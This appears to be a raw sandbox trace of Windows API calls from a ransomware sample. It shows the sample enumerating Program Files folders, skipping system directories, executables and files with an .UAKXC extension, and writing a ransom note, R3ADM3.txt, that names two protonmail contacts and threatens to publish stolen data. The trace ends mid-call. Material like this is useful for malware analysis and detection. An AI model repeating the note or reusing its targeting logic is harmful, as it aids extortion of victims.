[0139.406] StrStrIW (lpFirst="jre7", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.406] StrStrIW (lpFirst="jre7", lpSrch="System Volume Information") returned 0x0 [0139.406] StrStrIW (lpFirst="jre7", lpSrch="Boot") returned 0x0 [0139.406] StrStrIW (lpFirst="jre7", lpSrch="Windows") returned 0x0 [0139.406] StrStrIW (lpFirst="jre7", lpSrch="Trend Micro") returned 0x0 [0139.406] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0139.406] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0139.406] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec080 [0139.406] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0139.406] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0139.406] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6ba0 [0139.406] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2a50 [0139.406] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec080 | out: hHeap=0xea0000) returned 1 [0139.406] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5848e1b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5848e1b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5848e1b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.406] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.406] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.406] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.406] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.406] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.406] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.406] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.407] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.407] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.407] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5848e1b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5848e1b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5848e1b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0139.407] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebccd8 | out: hHeap=0xea0000) returned 1 [0139.407] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6bc8 | out: hHeap=0xea0000) returned 1 [0139.407] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.407] Sleep (dwMilliseconds=0x32) [0139.464] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0139.464] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0139.464] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee518 [0139.464] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0139.464] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee680 [0139.464] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0139.464] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0139.464] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc70 [0139.465] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee6f8 [0139.465] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee770 [0139.465] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0139.465] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee770 | out: hHeap=0xea0000) returned 1 [0139.465] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee6f8 | out: hHeap=0xea0000) returned 1 [0139.465] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc70 | out: hHeap=0xea0000) returned 1 [0139.465] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\microsoft analysis services\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.466] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.466] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.467] CloseHandle (hObject=0x210) returned 1 [0139.467] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0139.467] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0139.467] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x58526730, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58526730, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.467] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.467] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x58526730, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58526730, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.467] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.467] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.467] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1ae930, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1ae930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0139.467] lstrcmpW (lpString1="AS OLEDB", lpString2=".") returned 1 [0139.468] lstrcmpW (lpString1="AS OLEDB", lpString2="..") returned 1 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="tmp") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="winnt") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="temp") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="thumb") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="$Recycle.Bin") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="System Volume Information") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="Boot") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="Windows") returned 0x0 [0139.468] StrStrIW (lpFirst="AS OLEDB", lpSrch="Trend Micro") returned 0x0 [0139.468] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc70 [0139.468] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0139.468] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee6f8 [0139.468] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0139.468] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee6f8 | out: hHeap=0xea0000) returned 1 [0139.468] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0139.468] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc70 | out: hHeap=0xea0000) returned 1 [0139.468] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecc70 [0139.468] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd768 [0139.468] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0139.468] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x997212c0, ftCreationTime.dwHighDateTime=0x1d5832b, ftLastAccessTime.dwLowDateTime=0xd8c2b0a0, ftLastAccessTime.dwHighDateTime=0x1d5d660, ftLastWriteTime.dwLowDateTime=0xd8c2b0a0, ftLastWriteTime.dwHighDateTime=0x1d5d660, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="notepad.exe", cAlternateFileName="")) returned 1 [0139.468] lstrcmpW (lpString1="notepad.exe", lpString2=".") returned 1 [0139.469] lstrcmpW (lpString1="notepad.exe", lpString2="..") returned 1 [0139.469] StrStrIW (lpFirst="notepad.exe", lpSrch=".UAKXC") returned 0x0 [0139.469] StrStrIW (lpFirst="notepad.exe", lpSrch=".exe") returned=".exe" [0139.469] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58526730, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58526730, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58526730, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.469] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.469] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.469] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.469] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.469] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.469] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.469] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.469] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.469] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.469] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf670de50, ftCreationTime.dwHighDateTime=0x1d57eff, ftLastAccessTime.dwLowDateTime=0xb51a62f0, ftLastAccessTime.dwHighDateTime=0x1d5cc6b, ftLastWriteTime.dwLowDateTime=0xb51a62f0, ftLastWriteTime.dwHighDateTime=0x1d5cc6b, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webdrive.exe", cAlternateFileName="")) returned 1 [0139.469] lstrcmpW (lpString1="webdrive.exe", lpString2=".") returned 1 [0139.469] lstrcmpW (lpString1="webdrive.exe", lpString2="..") returned 1 [0139.469] StrStrIW (lpFirst="webdrive.exe", lpSrch=".UAKXC") returned 0x0 [0139.469] StrStrIW (lpFirst="webdrive.exe", lpSrch=".exe") returned=".exe" [0139.469] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf670de50, ftCreationTime.dwHighDateTime=0x1d57eff, ftLastAccessTime.dwLowDateTime=0xb51a62f0, ftLastAccessTime.dwHighDateTime=0x1d5cc6b, ftLastWriteTime.dwLowDateTime=0xb51a62f0, ftLastWriteTime.dwHighDateTime=0x1d5cc6b, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webdrive.exe", cAlternateFileName="")) returned 0 [0139.469] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8dd8 | out: hHeap=0xea0000) returned 1 [0139.469] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6bf0 | out: hHeap=0xea0000) returned 1 [0139.469] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.470] Sleep (dwMilliseconds=0x32) [0139.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee680 | out: hHeap=0xea0000) returned 1 [0139.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee518 | out: hHeap=0xea0000) returned 1 [0139.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0139.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec080 [0139.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6bf0 [0139.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0139.527] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xee0108 [0139.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0139.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.527] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6bf0 | out: hHeap=0xea0000) returned 1 [0139.528] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\microsoft office\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.529] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.529] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.530] CloseHandle (hObject=0x210) returned 1 [0139.530] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee0108 | out: hHeap=0xea0000) returned 1 [0139.530] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.530] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x585becb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x585becb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.530] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x585becb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x585becb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.530] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd68b1180, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd68b1180, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office14", cAlternateFileName="")) returned 1 [0139.531] lstrcmpW (lpString1="Office14", lpString2=".") returned 1 [0139.531] lstrcmpW (lpString1="Office14", lpString2="..") returned 1 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="tmp") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="winnt") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="temp") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="thumb") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="$Recycle.Bin") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="System Volume Information") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="Boot") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="Windows") returned 0x0 [0139.531] StrStrIW (lpFirst="Office14", lpSrch="Trend Micro") returned 0x0 [0139.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6bf0 [0139.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0139.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xee0108 [0139.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0139.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6bf0 | out: hHeap=0xea0000) returned 1 [0139.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6bf0 [0139.531] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee518 [0139.531] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee0108 | out: hHeap=0xea0000) returned 1 [0139.531] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x585becb0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x585becb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x585becb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.532] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.532] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.532] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.532] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.532] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.532] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.532] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.532] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.532] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.532] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x585becb0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x585becb0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x585becb0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0139.532] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0139.532] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c18 | out: hHeap=0xea0000) returned 1 [0139.532] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.532] Sleep (dwMilliseconds=0x32) [0139.589] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec080 | out: hHeap=0xea0000) returned 1 [0139.591] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0139.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee680 [0139.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0139.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee6f8 [0139.592] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0139.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee608 [0139.592] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6c18 [0139.593] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee770 [0139.593] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee7e8 [0139.593] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0139.593] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee7e8 | out: hHeap=0xea0000) returned 1 [0139.593] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee770 | out: hHeap=0xea0000) returned 1 [0139.593] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c18 | out: hHeap=0xea0000) returned 1 [0139.593] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.594] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.594] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.595] CloseHandle (hObject=0x210) returned 1 [0139.595] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0139.595] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee608 | out: hHeap=0xea0000) returned 1 [0139.595] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58657230, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58657230, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.595] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.595] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58657230, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58657230, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.595] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.595] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.596] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, 